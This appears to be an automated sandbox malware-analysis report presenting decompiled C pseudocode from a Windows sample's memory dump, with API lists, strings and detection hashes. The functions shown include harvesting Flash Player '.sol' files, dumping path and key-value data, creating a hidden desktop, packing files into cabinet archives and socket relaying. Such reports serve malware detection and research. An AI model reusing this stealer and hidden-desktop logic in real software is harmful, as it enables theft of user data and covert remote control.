    Function 00404F49, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E00404F49(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				char _v52;
				char _v2104;
				void* __edi;
				void* __esi;
				intOrPtr _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr* _t69;
				signed int _t74;
				intOrPtr _t77;
				signed int _t83;
				signed int _t85;
				void* _t86;

				_v12 = 0;
				if(E0040FE88(0, __ecx,  &_v52, _a4) != 0) {
					_t83 =  &_v24;
					_v24 = 0;
					_t47 = E0040B013(_v48, _v52, _t83);
					_v32 = _t47;
					if(_t47 != 0) {
						asm("sbb esi, esi");
						_t74 = _v24 - 9;
						_t85 =  !_t83 & _t74;
						_v16 = 0;
						_v20 = 0;
						if(_t85 > 0) {
							_t13 = _t47 + 4; // 0x4
							_t69 = _t13;
							while(1) {
								_t77 =  *((intOrPtr*)(_t69 - 4));
								_v36 = _t77;
								if(_t77 == 0) {
									break;
								}
								_t53 =  *_t69;
								_v28 = _t53;
								if(_t53 == 0) {
									break;
								} else {
									_t54 =  *((intOrPtr*)(_t69 + 4));
									_a4 = _t54;
									if(_t54 == 0) {
										break;
									} else {
										E0040F27D(_t77);
										E0040F27D(_v28);
										_t79 = _a4;
										E0040F27D(_a4);
										if(_v16 == 0) {
											L9:
											wnsprintfA( &_v2104, 0x7ff, "\nPath: %s\n", _a4);
											_t86 = _t86 + 0x10;
											if(E0040AFBA( &_v12,  &_v2104) == 0) {
												goto L14;
											} else {
												goto L10;
											}
										} else {
											_t74 = _t74 | 0xffffffff;
											if(E0040F547(_t74, _t79, _t74, _v16) == 0) {
												L10:
												wnsprintfA( &_v2104, 0x7ff, "%s=%s\n", _v36,  *_t69);
												_t86 = _t86 + 0x14;
												if(E0040AFBA( &_v12,  &_v2104) == 0) {
													L14:
													_v12 = _v12 & 0x00000000;
												} else {
													_v20 = _v20 + 9;
													_t69 = _t69 + 0x24;
													_v16 = _a4;
													if(_v20 < _t85) {
														continue;
													} else {
													}
												}
											} else {
												goto L9;
											}
										}
									}
								}
								goto L15;
							}
							E0040F0C0(_v12);
							goto L14;
						}
						L15:
						E0040F0DC(_v24, _v32);
					}
					E0040FF41( &_v52);
				}
				return _v12;
			}
























    0x00404f5f
    0x00404f69
    0x00404f75
    0x00404f78
    0x00404f7b
    0x00404f80
    0x00404f85
    0x00404f91
    0x00404f93
    0x00404f98
    0x00404f9a
    0x00404f9d
    0x00404fa0
    0x00404fa6
    0x00404fa6
    0x00404fa9
    0x00404fa9
    0x00404fac
    0x00404fb1
    0x00000000
    0x00000000
    0x00404fb7
    0x00404fb9
    0x00404fbe
    0x00000000
    0x00404fc4
    0x00404fc4
    0x00404fc7
    0x00404fcc
    0x00000000
    0x00404fd2
    0x00404fd2
    0x00404fda
    0x00404fdf
    0x00404fe2
    0x00404feb
    0x00405000
    0x00405014
    0x0040501a
    0x0040502e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404fed
    0x00404ff0
    0x00404ffe
    0x00405030
    0x00405046
    0x0040504c
    0x00405060
    0x00405082
    0x00405082
    0x00405062
    0x00405062
    0x00405069
    0x0040506c
    0x00405072
    0x00000000
    0x00000000
    0x00405078
    0x00405072
    0x00000000
    0x00000000
    0x00000000
    0x00404ffe
    0x00404feb
    0x00404fcc
    0x00000000
    0x00404fbe
    0x0040507d
    0x00000000
    0x0040507d
    0x00405086
    0x0040508c
    0x0040508c
    0x00405094
    0x00405094
    0x004050a0

    APIs
      • Part of subcall function 0040FE88: CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,0041AFD6,?,?,?,0040438B,00416538,025DF908,00000006), ref: 0040FEB4
      • Part of subcall function 0040FE88: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040438B,00416538,025DF908,00000006,00000000,00000000,00000000,00000000), ref: 0040FEC7
    • wnsprintfA.SHLWAPI ref: 00405014
    • wnsprintfA.SHLWAPI ref: 00405046
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Filewnsprintf$CreateSize
    • String ID: Path: %s$%s=%s
    • API String ID: 2143265763-3969205073
    • Opcode ID: 4bbbef1737ddc6e17752e3d47fa815d7a17ea37a3881e51d166b889865fad037
    • Instruction ID: 0bde1fe9cf7bf4c74afc59f25207c8e6b93a82bbb5edf45c9804380ee5412860
    • Opcode Fuzzy Hash: 4bbbef1737ddc6e17752e3d47fa815d7a17ea37a3881e51d166b889865fad037
    • Instruction Fuzzy Hash: 5A415E71D0061AABCF10EF95C840AEEBBB5FF44344F148176E814B7295D739AA45CF94
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A7DD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82networkCOMMON
    Download Yara Rule
    C-Code - Quality: 71%
    			E0040A7DD(char _a4) {
				char _v9;
				char _v16;
				char _v416;
				void* __ebx;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t23;
				char _t28;
				signed char _t34;
				void* _t40;
				void* _t45;
				void* _t48;

				_t19 =  *0x416c64; // 0x41b000
				_t1 = _t19 + 0x26; // 0x10000020
				_t2 = _t19 + 0x24; // 0x20001c
				_t40 = ( *_t1 & 0x000000ff) + _t19;
				_t3 = _t19 + 0x25; // 0x2000
				_t20 =  *_t3;
				_t5 = _t40 + 0x12c; // 0x200148
				_t45 = ( *_t2 & 0x000000ff) + _t5;
				_t41 = 0;
				_v9 = 0;
				if(_t20 > 0) {
					while(1) {
						_t48 =  *((intOrPtr*)(_t45 + (_t41 & 0x000000ff) * 2)) -  *0x416c50; // 0x409
						if(_t48 == 0) {
							break;
						}
						_t41 = _t41 + 1;
						if(_t41 < _t20) {
							continue;
						} else {
						}
						goto L5;
					}
					_v9 = 1;
				}
				L5:
				L004042E5();
				 *0x416fe4(0x416740);
				 *0x416a88 =  *0x416a88 + 1;
				_t23 = E0040C14A(_t41, E004046B3, 0x416796);
				_t50 = _v9;
				if(_v9 == 0) {
					E0040A6A0();
					 *0x416db4(0x202,  &_v416);
					 *0x416a88 =  *0x416a88 + 1;
					E0040C14A(_t41, E00409E00, 0);
					_t28 =  *0x416a8c; // 0x0
					_v16 = _t28;
					E004150D4(0, _t50, _a4,  &_v16);
					 *0x416a88 =  *0x416a88 + 1;
					E0040C14A(_t41, E0040A4AE, 0x416796);
					 *0x416a88 =  *0x416a88 + 1;
					 *0x416fe4(0x416758);
					 *0x416a88 =  *0x416a88 + 1;
					 *0x416774 = 0;
					 *0x416770 = 0;
					_a4 = 0;
					_t34 = E00408471( &_a4, _t41, 0, "PopOpO03-3331111");
					_t51 = _t34;
					if(_t34 != 0) {
						_t41 = _t34;
						E00404DB5(_a4, _t34, _t51);
						E0040F0C0(_a4);
					}
					_t23 = E0040C14A(_t41, E00404CEE, 0x416a88);
					if(_t23 != 0) {
						 *0x416a88 =  *0x416a88 - 1;
						return _t23;
					}
				}
				return _t23;
			}















    0x0040a7e6
    0x0040a7eb
    0x0040a7ef
    0x0040a7f3
    0x0040a7f5
    0x0040a7f5
    0x0040a7fc
    0x0040a7fc
    0x0040a803
    0x0040a805
    0x0040a80a
    0x0040a80c
    0x0040a813
    0x0040a81a
    0x00000000
    0x00000000
    0x0040a81c
    0x0040a820
    0x00000000
    0x00000000
    0x0040a822
    0x00000000
    0x0040a820
    0x0040a824
    0x0040a824
    0x0040a828
    0x0040a828
    0x0040a832
    0x0040a838
    0x0040a849
    0x0040a84e
    0x0040a851
    0x0040a857
    0x0040a868
    0x0040a86e
    0x0040a87a
    0x0040a87f
    0x0040a884
    0x0040a88e
    0x0040a893
    0x0040a89f
    0x0040a8a4
    0x0040a8af
    0x0040a8b5
    0x0040a8c4
    0x0040a8ca
    0x0040a8d0
    0x0040a8d3
    0x0040a8d8
    0x0040a8da
    0x0040a8dc
    0x0040a8e1
    0x0040a8e9
    0x0040a8e9
    0x0040a8f8
    0x0040a8ff
    0x0040a901
    0x00000000
    0x0040a901
    0x0040a8ff
    0x0040a90a

    APIs
    • RtlInitializeCriticalSection.NTDLL(00416740), ref: 0040A832
    • WSAStartup.WS2_32(00000202,?), ref: 0040A868
    • RtlInitializeCriticalSection.NTDLL(00416758), ref: 0040A8AF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalInitializeSection$Startup
    • String ID: PopOpO03-3331111
    • API String ID: 100036477-962168976
    • Opcode ID: 31f6f1e59355d3fe6bd820a9a6b5c5e9f7b8390bb57b7b5329f03a6ea53675a0
    • Instruction ID: 329d635010767d0fd457d61d6b01bed5a64a8ea320644c308da13513533a6568
    • Opcode Fuzzy Hash: 31f6f1e59355d3fe6bd820a9a6b5c5e9f7b8390bb57b7b5329f03a6ea53675a0
    • Instruction Fuzzy Hash: 5631D771640214ABCB016FA5EC86EE93BB9EF06345703C07BB945761D2DA78C491CBAD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00411B52, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E00411B52(char _a4) {
				void* _t26;
				intOrPtr _t28;
				WCHAR* _t34;
				intOrPtr* _t36;

				_t34 = 0;
				if(E00411A6B() != 0) {
					_t36 = E0040F0A8(0x950);
					if(_t36 == 0) {
						L7:
						E00411B31();
					} else {
						_t1 =  &_a4; // 0x415534
						_t2 = _t36 + 0x53e; // 0x53e
						if(PathCombineW(_t2,  *_t1, 0) == 0) {
							L6:
							E0040F0C0(_t36);
							goto L7;
						} else {
							_t3 = _t36 + 0x746; // 0x746
							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t22 > 0x00000000) == 0) {
								goto L6;
							} else {
								 *((intOrPtr*)(_t36 + 0x14)) = 0x7fffffff;
								_t7 = _t36 + 0x10; // 0x10
								 *_t7 = 0x7fffffff;
								 *((intOrPtr*)(_t36 + 0x24)) = 1;
								 *((intOrPtr*)(_t36 + 0x28)) = 1;
								_t10 = _t36 + 0x132; // 0x132
								E0040F0FC(_t10, "cabinet.dll", 0xc);
								_t11 = _t36 + 0x232; // 0x232
								_t26 = E0040F0FC(_t11, "?O", 2);
								_t12 = _t36 + 4; // 0x4
								_t28 =  *0x4176a4(_t12, E004119D7, E0041172B, E0041173E, E00411751, E0041183D, E00411874, E004118BA, E004118DB, E00411925, E0041195F, _t26, _t36);
								 *_t36 = _t28;
								if(_t28 == 0) {
									goto L6;
								} else {
									_t34 = _t36;
								}
							}
						}
					}
				}
				return _t34;
			}







    0x00411b53
    0x00411b5c
    0x00411b6d
    0x00411b71
    0x00411c3d
    0x00411c3d
    0x00411b77
    0x00411b78
    0x00411b7c
    0x00411b8b
    0x00411c37
    0x00411c38
    0x00000000
    0x00411b91
    0x00411b91
    0x00411baa
    0x00000000
    0x00411bb0
    0x00411bb5
    0x00411bb8
    0x00411bbb
    0x00411bc2
    0x00411bc5
    0x00411bcd
    0x00411bd4
    0x00411be0
    0x00411be7
    0x00411c1b
    0x00411c24
    0x00411c2d
    0x00411c31
    0x00000000
    0x00411c33
    0x00411c33
    0x00411c33
    0x00411c31
    0x00411baa
    0x00411b8b
    0x00411c42
    0x00411c46

    APIs
      • Part of subcall function 00411A6B: LoadLibraryA.KERNEL32(cabinet.dll,00000000,00411B5A,00000000,00411E2F,00405611,00000000,00000000,?,00415534,?,00405611,?), ref: 00411A7F
      • Part of subcall function 00411A6B: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00411A98
      • Part of subcall function 00411A6B: GetProcAddress.KERNEL32(FCIAddFile), ref: 00411AAE
      • Part of subcall function 00411A6B: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00411AC4
      • Part of subcall function 00411A6B: GetProcAddress.KERNEL32(FCIDestroy), ref: 00411ADA
      • Part of subcall function 00411A6B: HeapCreate.KERNEL32(00000000,00080000,00000000,?,00415534,?,00405611,?), ref: 00411B08
      • Part of subcall function 00411A6B: FreeLibrary.KERNEL32(?,00415534,?,00405611,?), ref: 00411B1D
    • PathCombineW.SHLWAPI(0000053E,4UA,00000000,00000000,00000000,00411E2F,00405611,00000000,00000000,?,00415534,?,00405611,?), ref: 00411B83
    • GetTempPathW.KERNEL32(00000103,00000746,?,00415534,?,00405611,?), ref: 00411B9D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$LibraryPath$CombineCreateFreeHeapLoadTemp
    • String ID: 4UA$cabinet.dll
    • API String ID: 2929573254-238230206
    • Opcode ID: 8637e56342af31a58a1afeb433268d77599254d55b9a76985ca6ff0e09ef27a7
    • Instruction ID: a4bc9d7652f6a033511903e8c4902c2ca4c763a4a97b570fe50f10f73e0c476a
    • Opcode Fuzzy Hash: 8637e56342af31a58a1afeb433268d77599254d55b9a76985ca6ff0e09ef27a7
    • Instruction Fuzzy Hash: 51112470390B01ABD634AF219D06FEB37A89F45B00B10453FB352A66E1EA7CD585C76C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004055B9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E004055B9(intOrPtr _a4) {
				short _v528;
				void* __edi;
				void* _t8;
				void* _t15;

				_t8 =  *0x416c44(0,  &_v528, 0x1a, 0);
				if(_t8 != 0) {
					PathCombineW( &_v528,  &_v528, L"Macromedia\\Flash Player");
					if(_a4 == 0) {
						_t8 = E004154D1(_t14, _t15,  &_v528);
					} else {
						_t14 =  &_v528;
						_t8 = E0040C174( &_v528, L"*.sol");
					}
				}
				if(_a4 != 0) {
					return _t8;
				} else {
					return E004050A3(_t14, 0, 2, 0);
				}
			}







    0x004055d1
    0x004055d9
    0x004055e8
    0x004055f1
    0x0040560c
    0x004055f3
    0x004055f8
    0x004055fe
    0x004055fe
    0x004055f1
    0x00405614
    0x00405623
    0x00405616
    0x00000000
    0x0040561b

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,00000000,00000000), ref: 004055D1
    • PathCombineW.SHLWAPI(?,?,Macromedia\Flash Player), ref: 004055E8
      • Part of subcall function 0040C174: PathCombineW.SHLWAPI(?,?,00401058,00000000,00000000,00000000), ref: 0040C197
      • Part of subcall function 0040C174: FindFirstFileW.KERNEL32(?,?), ref: 0040C1AA
      • Part of subcall function 0040C174: PathMatchSpecW.SHLWAPI(?,?), ref: 0040C1F5
      • Part of subcall function 0040C174: PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040C20D
      • Part of subcall function 0040C174: FindNextFileW.KERNEL32(00000000,?,?), ref: 0040C248
      • Part of subcall function 0040C174: FindClose.KERNEL32(00000000), ref: 0040C257
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Path$CombineFind$File$CloseFirstFolderMatchNextSpecSpecial
    • String ID: *.sol$Macromedia\Flash Player
    • API String ID: 304139136-1405511494
    • Opcode ID: c6cb4b04b49955f201d55adbfefb0e5492864ee2075f49904a40336ce694d937
    • Instruction ID: 28b938483968348d9918f5ccfde6b13c7139cd5862718c584add368721c31eec
    • Opcode Fuzzy Hash: c6cb4b04b49955f201d55adbfefb0e5492864ee2075f49904a40336ce694d937
    • Instruction Fuzzy Hash: B9F096F16012087AE710EB61DC89FBB772CC741344F608576B615A60C2DA798D448EAD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408CE8, Relevance: 6.1, APIs: 4, Instructions: 85COMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00408CE8(void* __eax, char _a4) {
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				char _v52;
				void* _v56;
				void* _v84;
				void* __esi;
				void* _t28;
				struct HDC__* _t33;
				struct HDC__* _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				void* _t47;
				void* _t48;
				char _t50;
				void* _t55;

				_t28 = E00414119(_t48);
				_t50 = _a4;
				if(_t28 != 0) {
					_t55 =  *0x416ac4(0);
					if(_t55 != 0) {
						_t33 =  *0x416e00(_t55);
						 *(_t50 + 0x10) = _t33;
						if(_t33 == 0) {
							_t47 = _v48;
						} else {
							_t41 =  *0x416e10(_t55, 8);
							 *((intOrPtr*)(_t50 + 0x14)) = _t41;
							_t42 =  *0x416e10(_t55, 0xa);
							 *((intOrPtr*)(_t50 + 0x18)) = _t42;
							_t47 =  *0x416dfc(_t55,  *((intOrPtr*)(_t50 + 0x14)), _t42);
							if(_t47 != 0) {
								_v84 = SelectObject( *(_t50 + 0x10), _t47);
							}
						}
						 *0x416acc(0, _t55);
						_t68 = _v56;
						if(_v56 != 0) {
							_v52 = _t50;
							_v48 = 0x408889;
							_v44 = 0x40888c;
							_v40 = E0040888F;
							_v36 = E0040890D;
							_v32 = E00408914;
							_v28 = E00408AC4;
							_v24 = 0x408ce7;
							E00413758(_t68,  *((intOrPtr*)(_t50 + 0xc)),  &_v52,  *((intOrPtr*)(_t50 + 4)));
						}
						_t35 =  *(_t50 + 0x10);
						if(_t35 != 0) {
							if(_v56 != 0) {
								SelectObject(_t35, _v56);
							}
							DeleteDC( *(_t50 + 0x10));
							if(_t47 != 0) {
								DeleteObject(_t47);
							}
						}
					}
				}
				E004108F5( *((intOrPtr*)(_t50 + 0xc)));
				E0040F0C0(_t50);
				return 0;
			}























    0x00408cf6
    0x00408cfb
    0x00408d00
    0x00408d0e
    0x00408d12
    0x00408d19
    0x00408d1f
    0x00408d24
    0x00408d5f
    0x00408d26
    0x00408d29
    0x00408d32
    0x00408d35
    0x00408d3f
    0x00408d49
    0x00408d4d
    0x00408d59
    0x00408d59
    0x00408d4d
    0x00408d66
    0x00408d6c
    0x00408d71
    0x00408d7e
    0x00408d82
    0x00408d8a
    0x00408d92
    0x00408d9a
    0x00408da2
    0x00408daa
    0x00408db2
    0x00408dba
    0x00408dba
    0x00408dbf
    0x00408dc4
    0x00408dcb
    0x00408dd2
    0x00408dd2
    0x00408ddb
    0x00408de3
    0x00408de6
    0x00408de6
    0x00408de3
    0x00408dc4
    0x00408d12
    0x00408def
    0x00408df5
    0x00408e02

    APIs
      • Part of subcall function 00414119: OpenWindowStationW.USER32(Winsta0,00000000,10000000), ref: 00414132
      • Part of subcall function 00414119: CreateWindowStationW.USER32(Winsta0,00000000,10000000,00000000), ref: 00414144
      • Part of subcall function 00414119: GetProcessWindowStation.USER32 ref: 00414156
      • Part of subcall function 00414119: OpenDesktopW.USER32(SubCallssEdit7792,00000000,00000000,10000000), ref: 00414177
      • Part of subcall function 00414119: CreateDesktopW.USER32(SubCallssEdit7792,00000000,00000000,00000000,10000000,00000000), ref: 00414189
      • Part of subcall function 00414119: GetCurrentThreadId.KERNEL32 ref: 00414195
      • Part of subcall function 00414119: GetThreadDesktop.USER32(00000000,?,?), ref: 0041419C
      • Part of subcall function 00414119: SetThreadDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141AE
      • Part of subcall function 00414119: CloseDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141C2
      • Part of subcall function 00414119: CloseWindowStation.USER32(?,?), ref: 004141E2
    • SelectObject.GDI32(?,00000000), ref: 00408D53
    • SelectObject.GDI32(?,00000000), ref: 00408DD2
    • DeleteDC.GDI32(?), ref: 00408DDB
    • DeleteObject.GDI32(?), ref: 00408DE6
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Desktop$StationWindow$ObjectThread$CloseCreateDeleteOpenSelect$CurrentProcess
    • String ID:
    • API String ID: 2578643875-0
    • Opcode ID: 7c8e6d8d55e7c764fea7ef4fd650cb840e2755fbd727cef450d42f5f86268655
    • Instruction ID: b3d1fd2ce2a1bfb911137bcd3b55876657658cdc2a0dda783e25cc8617eca9c3
    • Opcode Fuzzy Hash: 7c8e6d8d55e7c764fea7ef4fd650cb840e2755fbd727cef450d42f5f86268655
    • Instruction Fuzzy Hash: 80314F71204705AFC710AF61DD48A9BBBB8BF54315F04863EF894A26D0CB78D954CFAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408CEA, Relevance: 6.1, APIs: 4, Instructions: 85COMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00408CEA(void* __ecx, char _a4) {
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				char _v52;
				void* _v56;
				void* _v84;
				void* __esi;
				void* _t26;
				struct HDC__* _t31;
				struct HDC__* _t33;
				intOrPtr _t39;
				intOrPtr _t40;
				void* _t45;
				char _t48;
				void* _t53;

				_t26 = E00414119(__ecx);
				_t48 = _a4;
				if(_t26 == 0) {
					L13:
					E004108F5( *((intOrPtr*)(_t48 + 0xc)));
					E0040F0C0(_t48);
					return 0;
				}
				_t53 =  *0x416ac4(0);
				if(_t53 != 0) {
					_t31 =  *0x416e00(_t53);
					 *(_t48 + 0x10) = _t31;
					if(_t31 == 0) {
						_t45 = _v48;
					} else {
						_t39 =  *0x416e10(_t53, 8);
						 *((intOrPtr*)(_t48 + 0x14)) = _t39;
						_t40 =  *0x416e10(_t53, 0xa);
						 *((intOrPtr*)(_t48 + 0x18)) = _t40;
						_t45 =  *0x416dfc(_t53,  *((intOrPtr*)(_t48 + 0x14)), _t40);
						if(_t45 != 0) {
							_v84 = SelectObject( *(_t48 + 0x10), _t45);
						}
					}
					 *0x416acc(0, _t53);
					_t61 = _v56;
					if(_v56 != 0) {
						_v52 = _t48;
						_v48 = 0x408889;
						_v44 = 0x40888c;
						_v40 = E0040888F;
						_v36 = E0040890D;
						_v32 = E00408914;
						_v28 = E00408AC4;
						_v24 = 0x408ce7;
						E00413758(_t61,  *((intOrPtr*)(_t48 + 0xc)),  &_v52,  *((intOrPtr*)(_t48 + 4)));
					}
					_t33 =  *(_t48 + 0x10);
					if(_t33 != 0) {
						if(_v56 != 0) {
							SelectObject(_t33, _v56);
						}
						DeleteDC( *(_t48 + 0x10));
						if(_t45 != 0) {
							DeleteObject(_t45);
						}
					}
				}
			}






















    0x00408cf6
    0x00408cfb
    0x00408d00
    0x00408dec
    0x00408def
    0x00408df5
    0x00408e02
    0x00408e02
    0x00408d0e
    0x00408d12
    0x00408d19
    0x00408d1f
    0x00408d24
    0x00408d5f
    0x00408d26
    0x00408d29
    0x00408d32
    0x00408d35
    0x00408d3f
    0x00408d49
    0x00408d4d
    0x00408d59
    0x00408d59
    0x00408d4d
    0x00408d66
    0x00408d6c
    0x00408d71
    0x00408d7e
    0x00408d82
    0x00408d8a
    0x00408d92
    0x00408d9a
    0x00408da2
    0x00408daa
    0x00408db2
    0x00408dba
    0x00408dba
    0x00408dbf
    0x00408dc4
    0x00408dcb
    0x00408dd2
    0x00408dd2
    0x00408ddb
    0x00408de3
    0x00408de6
    0x00408de6
    0x00408de3
    0x00408dc4

    APIs
      • Part of subcall function 00414119: OpenWindowStationW.USER32(Winsta0,00000000,10000000), ref: 00414132
      • Part of subcall function 00414119: CreateWindowStationW.USER32(Winsta0,00000000,10000000,00000000), ref: 00414144
      • Part of subcall function 00414119: GetProcessWindowStation.USER32 ref: 00414156
      • Part of subcall function 00414119: OpenDesktopW.USER32(SubCallssEdit7792,00000000,00000000,10000000), ref: 00414177
      • Part of subcall function 00414119: CreateDesktopW.USER32(SubCallssEdit7792,00000000,00000000,00000000,10000000,00000000), ref: 00414189
      • Part of subcall function 00414119: GetCurrentThreadId.KERNEL32 ref: 00414195
      • Part of subcall function 00414119: GetThreadDesktop.USER32(00000000,?,?), ref: 0041419C
      • Part of subcall function 00414119: SetThreadDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141AE
      • Part of subcall function 00414119: CloseDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141C2
      • Part of subcall function 00414119: CloseWindowStation.USER32(?,?), ref: 004141E2
    • SelectObject.GDI32(?,00000000), ref: 00408D53
    • SelectObject.GDI32(?,00000000), ref: 00408DD2
    • DeleteDC.GDI32(?), ref: 00408DDB
    • DeleteObject.GDI32(?), ref: 00408DE6
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Desktop$StationWindow$ObjectThread$CloseCreateDeleteOpenSelect$CurrentProcess
    • String ID:
    • API String ID: 2578643875-0
    • Opcode ID: 13cb8732f482e92080d71640bc5d5e170680625adb5618aa74043ece38bbb537
    • Instruction ID: 129632a8a268434fe8942854e1cb099b8aefa11e76e8ac37a1e310d40adf2951
    • Opcode Fuzzy Hash: 13cb8732f482e92080d71640bc5d5e170680625adb5618aa74043ece38bbb537
    • Instruction Fuzzy Hash: A8315C71204705AFC710AF61D948A9BBBB8BF54315F04863EF994A26D0CB78D854CFAA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00414843, Relevance: 6.1, APIs: 4, Instructions: 80fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00414843(signed int __edx, long __edi, void** __esi, void* _a4) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t22;
				signed int _t25;
				signed int _t41;
				void** _t43;

				_t43 = __esi;
				_t41 = __edx;
				_v5 = 0;
				if(__edi <= 0xa00000) {
					_t22 = E0040FF8F( *__esi);
					_v36 = _t22;
					_v32 = _t41;
					if((_t22 & _t41) != 0xffffffff && E0040FF6F( *__esi, 0, 0, 2) != 0) {
						_t25 = E0040FF8F( *__esi);
						_v28 = _t25;
						_v24 = _t41;
						if((_t25 & _t41) != 0xffffffff) {
							E0040F173( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ __edi;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, __edi,  &_v12, 0) == 0 || _v12 != __edi) {
								E0040FF6F( *_t43, _v28, _v24, 0);
								SetEndOfFile( *_t43);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t43);
						E0040FF6F( *_t43, _v36, _v32, 0);
					}
				}
				return _v5;
			}














    0x00414843
    0x00414843
    0x0041484c
    0x00414855
    0x0041485d
    0x00414862
    0x00414867
    0x0041486d
    0x00414888
    0x0041488d
    0x00414892
    0x00414898
    0x004148a1
    0x004148ac
    0x004148c3
    0x004148f4
    0x004148fb
    0x004148e5
    0x004148e5
    0x004148e5
    0x004148c3
    0x00414903
    0x00414912
    0x00414912
    0x0041486d
    0x0041491c

    APIs
      • Part of subcall function 0040FF8F: SetFilePointerEx.KERNEL32(?,00000000,00000000,bHA,00000001,00414862,?,00000000,?,?,025DF908,00000008,00000000,00000000,00000000,00000000), ref: 0040FFA4
      • Part of subcall function 0040FF6F: SetFilePointerEx.KERNEL32(00000004,00000004,00000004,00000000,00000002,00414819,?,00000000,00000000,00000000), ref: 0040FF81
    • WriteFile.KERNEL32(?,00000000,00000005,00000000,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000), ref: 004148BB
    • WriteFile.KERNEL32(?,00000005,00000000,00000005,00000000,?,?,025DF908,00000008,00000000,00000000), ref: 004148D6
    • SetEndOfFile.KERNEL32(?,?,025DF908,00000008,00000000,?,?,025DF908,00000008,00000000,00000000,00000000,00000000), ref: 004148FB
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,?,?,025DF908,00000008,00000000,00000000,00000000,00000000), ref: 00414903
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: 8741bb120fa16adb0cecb998d26c48a7cc4e84cb754a9c8a4e1c0c4f88310b3c
    • Instruction ID: b25f87ce16402d26419eab2f474273d6bdb16962440f5cd0a3c9273388d2de79
    • Opcode Fuzzy Hash: 8741bb120fa16adb0cecb998d26c48a7cc4e84cb754a9c8a4e1c0c4f88310b3c
    • Instruction Fuzzy Hash: 08217C75900109EFDF21AFA4CC85AEFBBB9BF48344F10443AF190B11A0D73A8995DB24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00410739, Relevance: 6.1, APIs: 4, Instructions: 68networksynchronizationCOMMON
    Download Yara Rule
    APIs
    • WaitForSingleObject.KERNEL32(0100007F,00000000), ref: 00410758
    • recv.WS2_32(?,?,00000400,00000000), ref: 0041079C
    • send.WS2_32(?,?,00000000,00000000), ref: 004107B5
    • select.WS2_32(00000000,?,00000000,00000000,?), ref: 004107F4
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ObjectSingleWaitrecvselectsend
    • String ID:
    • API String ID: 4176622587-0
    • Opcode ID: 948e814f7f0162042123225db5f487293ab21045863ebbbd06a653ddea7ee5ff
    • Instruction ID: b2732716ba659e2a1a3da2628498ae1fb1a29879da45472d50e90d4a284b4380
    • Opcode Fuzzy Hash: 948e814f7f0162042123225db5f487293ab21045863ebbbd06a653ddea7ee5ff
